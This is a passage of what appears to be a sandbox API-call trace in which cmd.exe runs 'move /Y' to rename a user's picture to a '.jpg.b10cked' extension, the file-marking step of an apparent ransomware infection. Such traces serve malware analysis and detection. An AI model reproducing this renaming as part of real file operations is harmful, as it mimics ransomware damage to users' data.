(hConsoleHandle=0x7, dwMode=0x3) returned 1 [0144.911] _get_osfhandle (_FileHandle=0) returned 0x3 [0144.911] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0144.911] _get_osfhandle (_FileHandle=0) returned 0x3 [0144.911] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0144.911] GetEnvironmentStringsW () returned 0x4401d8* [0144.911] FreeEnvironmentStringsW (penv=0x4401d8) returned 1 [0144.911] GetEnvironmentStringsW () returned 0x4401d8* [0144.911] FreeEnvironmentStringsW (penv=0x4401d8) returned 1 [0144.911] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce7d4 | out: phkResult=0x2ce7d4*=0x40) returned 0x0 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x0, lpData=0x2ce7e0*=0x0, lpcbData=0x2ce7d8*=0x1000) returned 0x2 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x4, lpData=0x2ce7e0*=0x1, lpcbData=0x2ce7d8*=0x4) returned 0x0 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x0, lpData=0x2ce7e0*=0x1, lpcbData=0x2ce7d8*=0x1000) returned 0x2 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x4, lpData=0x2ce7e0*=0x0, lpcbData=0x2ce7d8*=0x4) returned 0x0 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x4, lpData=0x2ce7e0*=0x40, lpcbData=0x2ce7d8*=0x4) returned 0x0 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x4, lpData=0x2ce7e0*=0x40, lpcbData=0x2ce7d8*=0x4) returned 0x0 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x0, lpData=0x2ce7e0*=0x40, lpcbData=0x2ce7d8*=0x1000) returned 0x2 [0144.912] RegCloseKey (hKey=0x40) returned 0x0 [0144.912] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce7d4 | out: phkResult=0x2ce7d4*=0x40) returned 0x0 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x0, lpData=0x2ce7e0*=0x40, lpcbData=0x2ce7d8*=0x1000) returned 0x2 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x4, lpData=0x2ce7e0*=0x1, lpcbData=0x2ce7d8*=0x4) returned 0x0 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x0, lpData=0x2ce7e0*=0x1, lpcbData=0x2ce7d8*=0x1000) returned 0x2 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x4, lpData=0x2ce7e0*=0x0, lpcbData=0x2ce7d8*=0x4) returned 0x0 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x4, lpData=0x2ce7e0*=0x9, lpcbData=0x2ce7d8*=0x4) returned 0x0 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x4, lpData=0x2ce7e0*=0x9, lpcbData=0x2ce7d8*=0x4) returned 0x0 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x0, lpData=0x2ce7e0*=0x9, lpcbData=0x2ce7d8*=0x1000) returned 0x2 [0144.912] RegCloseKey (hKey=0x40) returned 0x0 [0144.912] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886373 [0144.912] srand (_Seed=0x5b886373) [0144.912] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg.b10cked\"" [0144.912] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg.b10cked\"" [0144.913] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.913] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x441938, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0144.913] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0144.913] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0144.913] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0144.913] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0144.913] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0144.913] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0144.913] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0144.913] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0144.913] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0144.913] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0144.913] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0144.913] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0144.914] GetEnvironmentStringsW () returned 0x442328* [0144.914] FreeEnvironmentStringsW (penv=0x442328) returned 1 [0144.914] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.914] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0144.914] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0144.914] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0144.914] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0144.914] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0144.914] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0144.914] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0144.914] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0144.914] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0144.914] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf5a0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.914] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf5a0, lpFilePart=0x2cf59c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf59c*="Desktop") returned 0x18 [0144.914] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0144.914] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf31c | out: lpFindFileData=0x2cf31c) returned 0x440068 [0144.914] FindClose (in: hFindFile=0x440068 | out: hFindFile=0x440068) returned 1 [0144.915] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf31c | out: lpFindFileData=0x2cf31c) returned 0x440068 [0144.915] FindClose (in: hFindFile=0x440068 | out: hFindFile=0x440068) returned 1 [0144.915] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf31c | out: lpFindFileData=0x2cf31c) returned 0x440068 [0144.915] FindClose (in: hFindFile=0x440068 | out: hFindFile=0x440068) returned 1 [0144.915] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0144.915] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0144.915] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0144.915] GetEnvironmentStringsW () returned 0x442b48* [0144.915] FreeEnvironmentStringsW (penv=0x442b48) returned 1 [0144.915] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.916] GetConsoleOutputCP () returned 0x1b5 [0144.916] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0144.916] GetUserDefaultLCID () returned 0x409 [0144.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0144.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf6e0, cchData=128 | out: lpLCData="0") returned 2 [0144.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf6e0, cchData=128 | out: lpLCData="0") returned 2 [0144.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf6e0, cchData=128 | out: lpLCData="1") returned 2 [0144.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0144.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0144.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0144.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0144.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0144.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0144.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0144.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0144.917] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0144.917] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0144.917] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0144.918] GetConsoleTitleW (in: lpConsoleTitle=0x430918, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.918] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0144.918] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0144.918] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0144.918] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0144.919] _wcsicmp (_String1="move", _String2=")") returned 68 [0144.919] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0144.919] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0144.919] _wcsicmp (_String1="IF", _String2="move") returned -4 [0144.919] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0144.919] _wcsicmp (_String1="REM", _String2="move") returned 5 [0144.919] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0144.924] GetConsoleTitleW (in: lpConsoleTitle=0x2cf3d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0145.042] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0145.042] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0145.042] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0145.042] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0145.042] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0145.042] _wcsicmp (_String1="move", _String2="CD") returned 10 [0145.043] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0145.043] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0145.043] _wcsicmp (_String1="move", _String2="REN") returned -5 [0145.043] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0145.043] _wcsicmp (_String1="move", _String2="SET") returned -6 [0145.043] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0145.043] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0145.043] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0145.043] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0145.043] _wcsicmp (_String1="move", _String2="MD") returned 11 [0145.043] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0145.043] _wcsicmp (_String1="move", _String2="RD") returned -5 [0145.043] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0145.043] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0145.043] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0145.043] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0145.043] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0145.043] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0145.043] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0145.043] _wcsicmp (_String1="move", _String2="VER") returned -9 [0145.043] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0145.043] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0145.043] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0145.043] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0145.043] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0145.043] _wcsicmp (_String1="move", _String2="START") returned -6 [0145.043] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0145.043] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0145.043] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0145.044] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0145.044] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0145.044] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2cf194, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2cf18c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2cf18c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0145.046] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0145.046] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0145.046] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0145.046] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0145.046] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0145.046] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0145.046] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0145.046] _wcsicmp (_String1="U8SH0R~1.JPG", _String2=".") returned 71 [0145.046] _wcsicmp (_String1="U8SH0R~1.JPG", _String2="..") returned 71 [0145.046] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\u8sh0r~1.jpg")) returned 0x20 [0145.046] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x441ec8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0145.046] SetErrorMode (uMode=0x0) returned 0x0 [0145.046] SetErrorMode (uMode=0x1) returned 0x0 [0145.046] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG", nBufferLength=0x104, lpBuffer=0x2ceb1c, lpFilePart=0x2ceb04 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG", lpFilePart=0x2ceb04*="U8SH0R~1.JPG") returned 0x38 [0145.046] SetErrorMode (uMode=0x0) returned 0x1 [0145.046] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1")) returned 0x12 [0145.047] _wcsicmp (_String1="U8SH0R~1.JPG", _String2=".") returned 71 [0145.047] _wcsicmp (_String1="U8SH0R~1.JPG", _String2="..") returned 71 [0145.047] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\u8sh0r~1.jpg")) returned 0x20 [0145.047] SetErrorMode (uMode=0x0) returned 0x0 [0145.047] SetErrorMode (uMode=0x1) returned 0x0 [0145.047] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG", nBufferLength=0x104, lpBuffer=0x2cef98, lpFilePart=0x2ced30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG", lpFilePart=0x2ced30*="U8SH0R~1.JPG") returned 0x38 [0145.047] SetErrorMode (uMode=0x0) returned 0x1 [0145.047] SetErrorMode (uMode=0x0) returned 0x0 [0145.047] SetErrorMode (uMode=0x1) returned 0x0 [0145.047] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x2cf1a0, lpFilePart=0x2ced30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg.b10cked", lpFilePart=0x2ced30*="u8sH0rXco9.jpg.b10cked") returned 0x42 [0145.047] SetErrorMode (uMode=0x0) returned 0x1 [0145.047] SetLastError (dwErrCode=0x0) [0145.047] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\u8sh0rxco9.jpg.b10cked")) returned 0xffffffff [0145.047] GetLastError () returned 0x2 [0145.047] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x2ce6ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce6ac) returned 0x430f48 [0145.047] FindNextFileW (in: hFindFile=0x430f48, lpFindFileData=0x2ce6ac | out: lpFindFileData=0x2ce6ac) returned 0 [0145.048] GetLastError () returned 0x12 [0145.048] FindClose (in: hFindFile=0x430f48 | out: hFindFile=0x430f48) returned 1 [0145.049] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x441c68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x441c68) returned 0x430f48 [0145.049] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x2ce944, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg.b10cked", lpFilePart=0x0) returned 0x42 [0145.049] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg", nBufferLength=0x104, lpBuffer=0x2ce944, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg", lpFilePart=0x0) returned 0x3a [0145.049] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\u8sh0rxco9.jpg")) returned 0x20 [0145.049] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\u8sh0rxco9.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\u8sh0rxco9.jpg.b10cked"), dwFlags=0x3) returned 1 [0145.050] FindClose (in: hFindFile=0x430f48 | out: hFindFile=0x430f48) returned 1 [0145.050] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2ce8f8 | out: _Buffer=" 1") returned 9 [0145.050] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.050] GetFileType (hFile=0x7) returned 0x2 [0145.050] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0145.050] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ce884 | out: lpMode=0x2ce884) returned 1 [0145.050] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.050] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce8b8 | out: lpConsoleScreenBufferInfo=0x2ce8b8) returned 1 [0145.050] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0145.051] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2ce8f8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0145.051] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2ce8dc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2ce8dc*=0x1a) returned 1 [0145.051] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.051] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0145.051] _get_osfhandle (_FileHandle=1) returned 0x7 [0145.051] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0145.051] _get_osfhandle (_FileHandle=0) returned 0x3 [0145.051] GetConsoleMode 